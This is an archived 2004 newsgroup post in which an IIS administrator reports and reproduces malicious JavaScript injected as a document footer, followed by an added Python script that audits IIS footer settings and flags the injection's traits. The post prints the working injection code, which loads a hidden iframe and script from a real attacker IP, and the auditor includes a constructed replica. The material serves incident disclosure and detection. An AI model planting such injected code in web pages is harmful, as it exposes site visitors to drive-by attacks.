QODS ec

Saturday, June 26, 2004

SEC: Russian IIS hack? Malicious Javascript code

microsoft.public.inetserver.iis.security: Russian IIS hack? Malicious Javascript code

From: Oca Hoeflein (Hoeflein_at_discussions.microsoft.com)
Date: 06/23/04

* Next in thread: Paul Lynch: "Re: Russian IIS hack? Malicious Javascript code"
* Reply: Paul Lynch: "Re: Russian IIS hack? Malicious Javascript code"
* Reply: Geoff Lane: "Re: Russian IIS hack? Malicious Javascript code"
* Reply: dh: "Re: Russian IIS hack? Malicious Javascript code"
* Reply: Ken: "Re: Russian IIS hack? Malicious Javascript code"
* Reply: LPD: "Re: Russian IIS hack? Malicious Javascript code"
* Reply: Ron Guyor: "Re: Russian IIS hack? Malicious Javascript code"
* Reply: srock: "Re: Russian IIS hack? Malicious Javascript code"
* Reply: Ron Guyor: "Re: Russian IIS hack? Malicious Javascript code"
* Reply: Marc Krueger: "Russian IIS hack? Malicious Javascript code"
* Reply: Patrick: "RE: Russian IIS hack? Malicious Javascript code"
* Reply: Lucas: "Re: Russian IIS hack? Malicious Javascript code"
* Reply: Lucas: "Russian IIS hack? Malicious Javascript code"
* Maybe reply: Wes Carberry: "Re: Russian IIS hack? Malicious Javascript code"

Date: Tue, 22 Jun 2004 17:42:01 -0700


I successfully removed some malicious code from my IIS 5.0 server, which may not have had all its patches applied, but I cannot find any information on this malicious code. It redirected the users of my websites, on a random basis, to a Russian website that appeared to be down: a domain called balamut.com with an IP address of 217.107.218.147, which reverse-resolves (RDNS) to unassigned.m10-msk-ru.e-neverland.net.

The JavaScript code lived in some fake .dll files in the inetsrv folder.
One fake .dll file was created for each web on my server, and in the IIS metabase DefaultDocFooter was set to each of the .dll files and EnableDocFooter was set to True.

The offending code was embedded in every file that the website delivered, and on pages that had embedded .js files the JavaScript for those pages would not function.

I have posted the offending code; maybe someone can identify this?

As proof, check out a Google search for one of the functions in the code, okx12().

You'll see the first link it returns is an RTF; if you view the HTML version, you'll see this code appended to the bottom of the page.

< script language="JavaScript" >< !--
// cookie helpers: gc099 reads a named cookie, sc088 sets one that expires 600000 ms (10 minutes) later
var qxco7=document.cookie;
function gc099(n21){var ix=qxco7.indexOf(n21+"=");if(ix==-1)return null;ix=qxco7.indexOf("=",ix)+1;var es=qxco7.indexOf(";",ix);if(es==-1)es=qxco7.length;return unescape(qxco7.substring(ix,es));}
function sc088(n24,v8){var today=new Date();var expiry=new Date(today.getTime()+600000);if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+"; expires="+expiry.toGMTString();qxco7=document.cookie;}
// okx12 blanks the browser status bar every 200 ms, so the injected URL is never shown there
function okx12(){window.status="";setTimeout("okx12()", 200);}
okx12();
// only on pages whose URL does not start with "https", and only if the trk716 cookie is absent (i.e. at most once per 10 minutes per browser):
// write a script tag and a 1x1 iframe both pointing at http://217.107.218.147/dot.php, then set the cookie
if(location.href.indexOf("https")!=0){if(gc099("trk716")==null){document.write("< script language=\"JavaScript\" src=\"http://217.107.218.147/dot.php\" >< /script >< iframe src=\"http://217.107.218.147/dot.php\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"no\"/>");sc088("trk716","4");}}
// -->< /script >
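Added example, not part of the original post or of the newsgroup thread: a Python script that audits the two things the post describes, the IIS document-footer settings (EnableDocFooter / DefaultDocFooter per metabase node) and the contents of the footer file those settings point at, scoring the body against the traits of the snippet above (status-bar blanking loop, cookie throttle, document.write of a script tag plus a 1x1 iframe, non-HTTPS trigger, bare-IP source). It assumes the metabase was dumped in the `[/w3svc/...]` section plus `PropertyName : (TYPE) value` line layout that `cscript adsutil.vbs ENUM_ALL /P w3svc` prints; the sample dump, the sample footer body, the `w1.dll` path and the 203.0.113.10 address are constructed for this example and do not come from the page.

```python
"""Added example, not from the original post: audit IIS document-footer settings
and scan the footer body for the injected-JavaScript pattern described above.

Assumption: the metabase dump is in the adsutil.vbs ENUM_ALL layout, i.e.
"[/w3svc/1/root]" section headers followed by "Name : (TYPE) value" lines.
SAMPLE_DUMP and SAMPLE_FOOTER are constructed; 203.0.113.10 (TEST-NET) stands
in for the real drop host.
"""
import re
from typing import Callable, Dict, List, Optional, Tuple

PATH_RE = re.compile(r"^\[(.+)\]\s*$")
PROP_RE = re.compile(r"^\s*(\w+)\s*:\s*\((\w+)\)\s*(.*?)\s*$")

# One entry per trait of the snippet reproduced in the post.
INDICATORS = [
    ("status-bar blanking loop", re.compile(r'window\.status\s*=\s*""\s*;\s*setTimeout', re.I)),
    ("script tag written at runtime", re.compile(r"document\.write\s*\(.{0,20}<\s*script", re.I | re.S)),
    ("1x1 iframe", re.compile(r'<\s*iframe[^>]*height=\\?"1\\?"[^>]*width=\\?"1\\?"', re.I)),
    ("cookie-based replay throttle", re.compile(r"document\.cookie\s*=.*expires=", re.I)),
    ("fires only on non-HTTPS pages", re.compile(r'location\.href\.indexOf\("https"\)\s*!=\s*0')),
    ("loads from a bare IP address", re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}/", re.I)),
]

SAMPLE_DUMP = """\
[/w3svc/1]
KeyType                         : (STRING) "IIsWebServer"
[/w3svc/1/root]
EnableDocFooter                 : (BOOLEAN) True
DefaultDocFooter                : (STRING) "FILE:C:\\WINNT\\system32\\inetsrv\\w1.dll"
[/w3svc/2/root]
EnableDocFooter                 : (BOOLEAN) False
DefaultDocFooter                : (STRING) "FILE:C:\\Inetpub\\footer.htm"
"""

# Constructed footer body mimicking the structure of the posted snippet.
SAMPLE_FOOTER = (
    '<script language="JavaScript"><!--\n'
    'function sc(n,v){var e=new Date(new Date().getTime()+600000);'
    'document.cookie=n+"="+escape(v)+"; expires="+e.toGMTString();}\n'
    'function st(){window.status="";setTimeout("st()",200);}st();\n'
    'if(location.href.indexOf("https")!=0){if(document.cookie.indexOf("trk=")==-1){'
    'document.write("<script src=\\"http://203.0.113.10/dot.php\\"></script>'
    '<iframe src=\\"http://203.0.113.10/dot.php\\" height=\\"1\\" width=\\"1\\"></iframe>");'
    'sc("trk","1");}}\n'
    "// --></script>"
)


def parse_adsutil_dump(text: str) -> Dict[str, Dict[str, str]]:
    """Map each metabase path to its {property: value} pairs (surrounding quotes stripped)."""
    nodes: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for line in text.splitlines():
        m = PATH_RE.match(line)
        if m:
            current = m.group(1)
            nodes.setdefault(current, {})
            continue
        m = PROP_RE.match(line)
        if m and current is not None:
            name, _typ, value = m.groups()
            nodes[current][name] = value.strip('"')
    return nodes


def enabled_footers(nodes: Dict[str, Dict[str, str]]) -> List[Tuple[str, str]]:
    """(path, DefaultDocFooter) for every node whose EnableDocFooter is True."""
    return [(path, props.get("DefaultDocFooter", ""))
            for path, props in nodes.items()
            if props.get("EnableDocFooter", "").lower() == "true"]


def footer_file(raw: str) -> Optional[str]:
    """DefaultDocFooter is 'FILE:<path>' (read from disk) or 'STRING:<html>' (inline)."""
    return raw[5:] if raw.upper().startswith("FILE:") else None


def footer_indicators(body: str) -> List[str]:
    """Names of the injected-snippet traits present in a footer body."""
    return [name for name, rx in INDICATORS if rx.search(body)]


def audit(dump: str, read_file: Callable[[str], Optional[str]]) -> List[dict]:
    """One finding per enabled footer; an empty 'reasons' list means it looked clean.
    read_file is supplied by the caller (a wrapper around open(), or a dict.get for samples)."""
    findings = []
    for path, raw in enabled_footers(parse_adsutil_dump(dump)):
        reasons: List[str] = []
        disk_path = footer_file(raw)
        if disk_path and re.search(r"\\inetsrv\\[^\\]+\.dll$", disk_path, re.I):
            reasons.append("footer is a .dll under inetsrv, not a normal footer location")
        body = (read_file(disk_path) or "") if disk_path else raw.split(":", 1)[-1]
        reasons.extend(footer_indicators(body))
        findings.append({"path": path, "footer": raw, "reasons": reasons})
    return findings


if __name__ == "__main__":
    sample_fs = {"C:\\WINNT\\system32\\inetsrv\\w1.dll": SAMPLE_FOOTER}
    for f in audit(SAMPLE_DUMP, sample_fs.get):
        print(f["path"], f["footer"], "FLAGGED" if f["reasons"] else "clean")
        for r in f["reasons"]:
            print("  -", r)
```

Against a real server you would replace `sample_fs.get` with a function that opens the path from the dump; the configuration check alone is worth running on every site, since a footer that is enabled and points at a `.dll` under inetsrv is already abnormal regardless of what the file contains.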
